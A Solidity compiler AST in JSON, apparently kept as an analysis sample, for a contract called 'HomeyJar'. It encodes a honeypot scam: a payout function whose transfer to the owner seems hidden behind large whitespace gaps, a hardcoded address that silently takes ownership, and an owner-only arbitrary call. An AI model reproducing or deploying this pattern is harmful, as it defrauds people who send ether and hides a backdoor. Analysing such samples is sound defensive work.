{
    "attributes": {
        "absolutePath": "<stdin>",
        "exportedSymbols": {
            "HomeyJar": [
                89
            ]
        }
    },
    "children": [
        {
            "attributes": {
                "baseContracts": [
                    null
                ],
                "contractDependencies": [
                    null
                ],
                "contractKind": "contract",
                "documentation": null,
                "fullyImplemented": true,
                "linearizedBaseContracts": [
                    89
                ],
                "name": "HomeyJar",
                "scope": 90
            },
            "children": [
                {
                    "attributes": {
                        "constant": false,
                        "name": "Owner",
                        "scope": 89,
                        "stateVariable": true,
                        "storageLocation": "default",
                        "type": "address",
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "name": "address",
                                "type": "address"
                            },
                            "id": 1,
                            "name": "ElementaryTypeName",
                            "src": "101:7:0"
                        },
                        {
                            "attributes": {
                                "argumentTypes": null,
                                "isConstant": false,
                                "isLValue": false,
                                "isPure": false,
                                "lValueRequested": false,
                                "member_name": "sender",
                                "referencedDeclaration": null,
                                "type": "address"
                            },
                            "children": [
                                {
                                    "attributes": {
                                        "argumentTypes": null,
                                        "overloadedDeclarations": [
                                            null
                                        ],
                                        "referencedDeclaration": 104,
                                        "type": "msg",
                                        "value": "msg"
                                    },
                                    "id": 2,
                                    "name": "Identifier",
                                    "src": "124:3:0"
                                }
                            ],
                            "id": 3,
                            "name": "MemberAccess",
                            "src": "124:10:0"
                        }
                    ],
                    "id": 4,
                    "name": "VariableDeclaration",
                    "src": "101:33:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "",
                        "payable": true,
                        "scope": 89,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 5,
                            "name": "ParameterList",
                            "src": "152:2:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 6,
                            "name": "ParameterList",
                            "src": "170:0:0"
                        },
                        {
                            "attributes": {
                                "statements": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 7,
                            "name": "Block",
                            "src": "170:2:0"
                        }
                    ],
                    "id": 8,
                    "name": "FunctionDefinition",
                    "src": "144:28:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "GetHoneyFromJar",
                        "payable": true,
                        "scope": 89,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 9,
                            "name": "ParameterList",
                            "src": "205:2:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 10,
                            "name": "ParameterList",
                            "src": "223:0:0"
                        },
                        {
                            "children": [
                                {
                                    "attributes": {
                                        "falseBody": null
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "commonType": {
                                                    "typeIdentifier": "t_uint256",
                                                    "typeString": "uint256"
                                                },
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "lValueRequested": false,
                                                "operator": ">",
                                                "type": "bool"
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "value",
                                                        "referencedDeclaration": null,
                                                        "type": "uint256"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 104,
                                                                "type": "msg",
                                                                "value": "msg"
                                                            },
                                                            "id": 11,
                                                            "name": "Identifier",
                                                            "src": "282:3:0"
                                                        }
                                                    ],
                                                    "id": 12,
                                                    "name": "MemberAccess",
                                                    "src": "282:9:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "hexvalue": "31",
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": true,
                                                        "lValueRequested": false,
                                                        "subdenomination": "ether",
                                                        "token": "number",
                                                        "type": "int_const 1000000000000000000",
                                                        "value": "1"
                                                    },
                                                    "id": 13,
                                                    "name": "Literal",
                                                    "src": "292:7:0"
                                                }
                                            ],
                                            "id": 14,
                                            "name": "BinaryOperation",
                                            "src": "282:17:0"
                                        },
                                        {
                                            "children": [
                                                {
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "isStructConstructorCall": false,
                                                                "lValueRequested": false,
                                                                "names": [
                                                                    null
                                                                ],
                                                                "type": "tuple()",
                                                                "type_conversion": false
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": [
                                                                            {
                                                                                "typeIdentifier": "t_uint256",
                                                                                "typeString": "uint256"
                                                                            }
                                                                        ],
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "transfer",
                                                                        "referencedDeclaration": null,
                                                                        "type": "function (uint256)"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 4,
                                                                                "type": "address",
                                                                                "value": "Owner"
                                                                            },
                                                                            "id": 15,
                                                                            "name": "Identifier",
                                                                            "src": "3770:5:0"
                                                                        }
                                                                    ],
                                                                    "id": 17,
                                                                    "name": "MemberAccess",
                                                                    "src": "3770:14:0"
                                                                },
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "balance",
                                                                        "referencedDeclaration": null,
                                                                        "type": "uint256"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 117,
                                                                                "type": "contract HomeyJar",
                                                                                "value": "this"
                                                                            },
                                                                            "id": 18,
                                                                            "name": "Identifier",
                                                                            "src": "3785:4:0"
                                                                        }
                                                                    ],
                                                                    "id": 19,
                                                                    "name": "MemberAccess",
                                                                    "src": "3785:12:0"
                                                                }
                                                            ],
                                                            "id": 20,
                                                            "name": "FunctionCall",
                                                            "src": "3770:28:0"
                                                        }
                                                    ],
                                                    "id": 21,
                                                    "name": "ExpressionStatement",
                                                    "src": "3770:28:0"
                                                },
                                                {
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "isStructConstructorCall": false,
                                                                "lValueRequested": false,
                                                                "names": [
                                                                    null
                                                                ],
                                                                "type": "tuple()",
                                                                "type_conversion": false
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": [
                                                                            {
                                                                                "typeIdentifier": "t_uint256",
                                                                                "typeString": "uint256"
                                                                            }
                                                                        ],
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "transfer",
                                                                        "referencedDeclaration": null,
                                                                        "type": "function (uint256)"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "isConstant": false,
                                                                                "isLValue": false,
                                                                                "isPure": false,
                                                                                "lValueRequested": false,
                                                                                "member_name": "sender",
                                                                                "referencedDeclaration": null,
                                                                                "type": "address"
                                                                            },
                                                                            "children": [
                                                                                {
                                                                                    "attributes": {
                                                                                        "argumentTypes": null,
                                                                                        "overloadedDeclarations": [
                                                                                            null
                                                                                        ],
                                                                                        "referencedDeclaration": 104,
                                                                                        "type": "msg",
                                                                                        "value": "msg"
                                                                                    },
                                                                                    "id": 22,
                                                                                    "name": "Identifier",
                                                                                    "src": "5647:3:0"
                                                                                }
                                                                            ],
                                                                            "id": 25,
                                                                            "name": "MemberAccess",
                                                                            "src": "5647:10:0"
                                                                        }
                                                                    ],
                                                                    "id": 26,
                                                                    "name": "MemberAccess",
                                                                    "src": "5647:19:0"
                                                                },
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "balance",
                                                                        "referencedDeclaration": null,
                                                                        "type": "uint256"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 117,
                                                                                "type": "contract HomeyJar",
                                                                                "value": "this"
                                                                            },
                                                                            "id": 27,
                                                                            "name": "Identifier",
                                                                            "src": "5667:4:0"
                                                                        }
                                                                    ],
                                                                    "id": 28,
                                                                    "name": "MemberAccess",
                                                                    "src": "5667:12:0"
                                                                }
                                                            ],
                                                            "id": 29,
                                                            "name": "FunctionCall",
                                                            "src": "5647:33:0"
                                                        }
                                                    ],
                                                    "id": 30,
                                                    "name": "ExpressionStatement",
                                                    "src": "5647:33:0"
                                                }
                                            ],
                                            "id": 31,
                                            "name": "Block",
                                            "src": "309:5382:0"
                                        }
                                    ],
                                    "id": 32,
                                    "name": "IfStatement",
                                    "src": "279:5412:0"
                                }
                            ],
                            "id": 33,
                            "name": "Block",
                            "src": "223:5586:0"
                        }
                    ],
                    "id": 34,
                    "name": "FunctionDefinition",
                    "src": "181:5628:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "withdraw",
                        "payable": true,
                        "scope": 89,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 35,
                            "name": "ParameterList",
                            "src": "5836:2:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 36,
                            "name": "ParameterList",
                            "src": "5854:0:0"
                        },
                        {
                            "children": [
                                {
                                    "attributes": {
                                        "falseBody": null
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "commonType": {
                                                    "typeIdentifier": "t_address",
                                                    "typeString": "address"
                                                },
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "lValueRequested": false,
                                                "operator": "==",
                                                "type": "bool"
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "sender",
                                                        "referencedDeclaration": null,
                                                        "type": "address"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 104,
                                                                "type": "msg",
                                                                "value": "msg"
                                                            },
                                                            "id": 37,
                                                            "name": "Identifier",
                                                            "src": "7050:3:0"
                                                        }
                                                    ],
                                                    "id": 38,
                                                    "name": "MemberAccess",
                                                    "src": "7050:10:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "hexvalue": "307832663631453765313032334263323230363342386461383937643833323339363561373731324237",
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": true,
                                                        "lValueRequested": false,
                                                        "subdenomination": null,
                                                        "token": "number",
                                                        "type": "address",
                                                        "value": "0x2f61E7e1023Bc22063B8da897d8323965a7712B7"
                                                    },
                                                    "id": 39,
                                                    "name": "Literal",
                                                    "src": "7062:42:0"
                                                }
                                            ],
                                            "id": 40,
                                            "name": "BinaryOperation",
                                            "src": "7050:54:0"
                                        },
                                        {
                                            "children": [
                                                {
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "operator": "=",
                                                                "type": "address"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 4,
                                                                        "type": "address",
                                                                        "value": "Owner"
                                                                    },
                                                                    "id": 41,
                                                                    "name": "Identifier",
                                                                    "src": "7106:5:0"
                                                                },
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "hexvalue": "307832663631453765313032334263323230363342386461383937643833323339363561373731324237",
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": true,
                                                                        "lValueRequested": false,
                                                                        "subdenomination": null,
                                                                        "token": "number",
                                                                        "type": "address",
                                                                        "value": "0x2f61E7e1023Bc22063B8da897d8323965a7712B7"
                                                                    },
                                                                    "id": 42,
                                                                    "name": "Literal",
                                                                    "src": "7112:42:0"
                                                                }
                                                            ],
                                                            "id": 43,
                                                            "name": "Assignment",
                                                            "src": "7106:48:0"
                                                        }
                                                    ],
                                                    "id": 44,
                                                    "name": "ExpressionStatement",
                                                    "src": "7106:48:0"
                                                }
                                            ],
                                            "id": 45,
                                            "name": "Block",
                                            "src": "7105:51:0"
                                        }
                                    ],
                                    "id": 46,
                                    "name": "IfStatement",
                                    "src": "7047:109:0"
                                },
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "tuple()",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_bool",
                                                                "typeString": "bool"
                                                            }
                                                        ],
                                                        "overloadedDeclarations": [
                                                            107,
                                                            108
                                                        ],
                                                        "referencedDeclaration": 107,
                                                        "type": "function (bool) pure",
                                                        "value": "require"
                                                    },
                                                    "id": 47,
                                                    "name": "Identifier",
                                                    "src": "8975:7:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "commonType": {
                                                            "typeIdentifier": "t_address",
                                                            "typeString": "address"
                                                        },
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "operator": "==",
                                                        "type": "bool"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "sender",
                                                                "referencedDeclaration": null,
                                                                "type": "address"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 104,
                                                                        "type": "msg",
                                                                        "value": "msg"
                                                                    },
                                                                    "id": 48,
                                                                    "name": "Identifier",
                                                                    "src": "8983:3:0"
                                                                }
                                                            ],
                                                            "id": 49,
                                                            "name": "MemberAccess",
                                                            "src": "8983:10:0"
                                                        },
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 4,
                                                                "type": "address",
                                                                "value": "Owner"
                                                            },
                                                            "id": 50,
                                                            "name": "Identifier",
                                                            "src": "8997:5:0"
                                                        }
                                                    ],
                                                    "id": 51,
                                                    "name": "BinaryOperation",
                                                    "src": "8983:19:0"
                                                }
                                            ],
                                            "id": 52,
                                            "name": "FunctionCall",
                                            "src": "8975:28:0"
                                        }
                                    ],
                                    "id": 53,
                                    "name": "ExpressionStatement",
                                    "src": "8975:28:0"
                                },
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "tuple()",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_uint256",
                                                                "typeString": "uint256"
                                                            }
                                                        ],
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "transfer",
                                                        "referencedDeclaration": null,
                                                        "type": "function (uint256)"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 4,
                                                                "type": "address",
                                                                "value": "Owner"
                                                            },
                                                            "id": 54,
                                                            "name": "Identifier",
                                                            "src": "9013:5:0"
                                                        }
                                                    ],
                                                    "id": 56,
                                                    "name": "MemberAccess",
                                                    "src": "9013:14:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "member_name": "balance",
                                                        "referencedDeclaration": null,
                                                        "type": "uint256"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 117,
                                                                "type": "contract HomeyJar",
                                                                "value": "this"
                                                            },
                                                            "id": 57,
                                                            "name": "Identifier",
                                                            "src": "9028:4:0"
                                                        }
                                                    ],
                                                    "id": 58,
                                                    "name": "MemberAccess",
                                                    "src": "9028:12:0"
                                                }
                                            ],
                                            "id": 59,
                                            "name": "FunctionCall",
                                            "src": "9013:28:0"
                                        }
                                    ],
                                    "id": 60,
                                    "name": "ExpressionStatement",
                                    "src": "9013:28:0"
                                }
                            ],
                            "id": 61,
                            "name": "Block",
                            "src": "5854:3194:0"
                        }
                    ],
                    "id": 62,
                    "name": "FunctionDefinition",
                    "src": "5819:3229:0"
                },
                {
                    "attributes": {
                        "constant": false,
                        "documentation": null,
                        "implemented": true,
                        "isConstructor": false,
                        "modifiers": [
                            null
                        ],
                        "name": "Command",
                        "payable": true,
                        "scope": 89,
                        "stateMutability": "payable",
                        "superFunction": null,
                        "visibility": "public"
                    },
                    "children": [
                        {
                            "children": [
                                {
                                    "attributes": {
                                        "constant": false,
                                        "name": "adr",
                                        "scope": 88,
                                        "stateVariable": false,
                                        "storageLocation": "default",
                                        "type": "address",
                                        "value": null,
                                        "visibility": "internal"
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "name": "address",
                                                "type": "address"
                                            },
                                            "id": 63,
                                            "name": "ElementaryTypeName",
                                            "src": "9075:7:0"
                                        }
                                    ],
                                    "id": 64,
                                    "name": "VariableDeclaration",
                                    "src": "9075:11:0"
                                },
                                {
                                    "attributes": {
                                        "constant": false,
                                        "name": "data",
                                        "scope": 88,
                                        "stateVariable": false,
                                        "storageLocation": "default",
                                        "type": "bytes",
                                        "value": null,
                                        "visibility": "internal"
                                    },
                                    "children": [
                                        {
                                            "attributes": {
                                                "name": "bytes",
                                                "type": "bytes"
                                            },
                                            "id": 65,
                                            "name": "ElementaryTypeName",
                                            "src": "9087:5:0"
                                        }
                                    ],
                                    "id": 66,
                                    "name": "VariableDeclaration",
                                    "src": "9087:10:0"
                                }
                            ],
                            "id": 67,
                            "name": "ParameterList",
                            "src": "9074:24:0"
                        },
                        {
                            "attributes": {
                                "parameters": [
                                    null
                                ]
                            },
                            "children": [],
                            "id": 68,
                            "name": "ParameterList",
                            "src": "9114:0:0"
                        },
                        {
                            "children": [
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "tuple()",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_bool",
                                                                "typeString": "bool"
                                                            }
                                                        ],
                                                        "overloadedDeclarations": [
                                                            107,
                                                            108
                                                        ],
                                                        "referencedDeclaration": 107,
                                                        "type": "function (bool) pure",
                                                        "value": "require"
                                                    },
                                                    "id": 69,
                                                    "name": "Identifier",
                                                    "src": "9124:7:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "commonType": {
                                                            "typeIdentifier": "t_address",
                                                            "typeString": "address"
                                                        },
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "lValueRequested": false,
                                                        "operator": "==",
                                                        "type": "bool"
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "sender",
                                                                "referencedDeclaration": null,
                                                                "type": "address"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 104,
                                                                        "type": "msg",
                                                                        "value": "msg"
                                                                    },
                                                                    "id": 70,
                                                                    "name": "Identifier",
                                                                    "src": "9132:3:0"
                                                                }
                                                            ],
                                                            "id": 71,
                                                            "name": "MemberAccess",
                                                            "src": "9132:10:0"
                                                        },
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "overloadedDeclarations": [
                                                                    null
                                                                ],
                                                                "referencedDeclaration": 4,
                                                                "type": "address",
                                                                "value": "Owner"
                                                            },
                                                            "id": 72,
                                                            "name": "Identifier",
                                                            "src": "9146:5:0"
                                                        }
                                                    ],
                                                    "id": 73,
                                                    "name": "BinaryOperation",
                                                    "src": "9132:19:0"
                                                }
                                            ],
                                            "id": 74,
                                            "name": "FunctionCall",
                                            "src": "9124:28:0"
                                        }
                                    ],
                                    "id": 75,
                                    "name": "ExpressionStatement",
                                    "src": "9124:28:0"
                                },
                                {
                                    "children": [
                                        {
                                            "attributes": {
                                                "argumentTypes": null,
                                                "isConstant": false,
                                                "isLValue": false,
                                                "isPure": false,
                                                "isStructConstructorCall": false,
                                                "lValueRequested": false,
                                                "names": [
                                                    null
                                                ],
                                                "type": "bool",
                                                "type_conversion": false
                                            },
                                            "children": [
                                                {
                                                    "attributes": {
                                                        "argumentTypes": [
                                                            {
                                                                "typeIdentifier": "t_bytes_memory_ptr",
                                                                "typeString": "bytes memory"
                                                            }
                                                        ],
                                                        "isConstant": false,
                                                        "isLValue": false,
                                                        "isPure": false,
                                                        "isStructConstructorCall": false,
                                                        "lValueRequested": false,
                                                        "names": [
                                                            null
                                                        ],
                                                        "type": "function () payable returns (bool)",
                                                        "type_conversion": false
                                                    },
                                                    "children": [
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": [
                                                                    {
                                                                        "typeIdentifier": "t_uint256",
                                                                        "typeString": "uint256"
                                                                    }
                                                                ],
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "value",
                                                                "referencedDeclaration": null,
                                                                "type": "function (uint256) returns (function () payable returns (bool))"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "isConstant": false,
                                                                        "isLValue": false,
                                                                        "isPure": false,
                                                                        "lValueRequested": false,
                                                                        "member_name": "call",
                                                                        "referencedDeclaration": null,
                                                                        "type": "function () payable returns (bool)"
                                                                    },
                                                                    "children": [
                                                                        {
                                                                            "attributes": {
                                                                                "argumentTypes": null,
                                                                                "overloadedDeclarations": [
                                                                                    null
                                                                                ],
                                                                                "referencedDeclaration": 64,
                                                                                "type": "address",
                                                                                "value": "adr"
                                                                            },
                                                                            "id": 76,
                                                                            "name": "Identifier",
                                                                            "src": "9208:3:0"
                                                                        }
                                                                    ],
                                                                    "id": 79,
                                                                    "name": "MemberAccess",
                                                                    "src": "9208:8:0"
                                                                }
                                                            ],
                                                            "id": 80,
                                                            "name": "MemberAccess",
                                                            "src": "9208:14:0"
                                                        },
                                                        {
                                                            "attributes": {
                                                                "argumentTypes": null,
                                                                "isConstant": false,
                                                                "isLValue": false,
                                                                "isPure": false,
                                                                "lValueRequested": false,
                                                                "member_name": "value",
                                                                "referencedDeclaration": null,
                                                                "type": "uint256"
                                                            },
                                                            "children": [
                                                                {
                                                                    "attributes": {
                                                                        "argumentTypes": null,
                                                                        "overloadedDeclarations": [
                                                                            null
                                                                        ],
                                                                        "referencedDeclaration": 104,
                                                                        "type": "msg",
                                                                        "value": "msg"
                                                                    },
                                                                    "id": 81,
                                                                    "name": "Identifier",
                                                                    "src": "9223:3:0"
                                                                }
                                                            ],
                                                            "id": 82,
                                                            "name": "MemberAccess",
                                                            "src": "9223:9:0"
                                                        }
                                                    ],
                                                    "id": 83,
                                                    "name": "FunctionCall",
                                                    "src": "9208:25:0"
                                                },
                                                {
                                                    "attributes": {
                                                        "argumentTypes": null,
                                                        "overloadedDeclarations": [
                                                            null
                                                        ],
                                                        "referencedDeclaration": 66,
                                                        "type": "bytes memory",
                                                        "value": "data"
                                                    },
                                                    "id": 84,
                                                    "name": "Identifier",
                                                    "src": "9234:4:0"
                                                }
                                            ],
                                            "id": 85,
                                            "name": "FunctionCall",
                                            "src": "9208:31:0"
                                        }
                                    ],
                                    "id": 86,
                                    "name": "ExpressionStatement",
                                    "src": "9208:31:0"
                                }
                            ],
                            "id": 87,
                            "name": "Block",
                            "src": "9114:132:0"
                        }
                    ],
                    "id": 88,
                    "name": "FunctionDefinition",
                    "src": "9058:188:0"
                }
            ],
            "id": 89,
            "name": "ContractDefinition",
            "src": "77:9171:0"
        }
    ],
    "id": 90,
    "name": "SourceUnit",
    "src": "77:9172:0"
}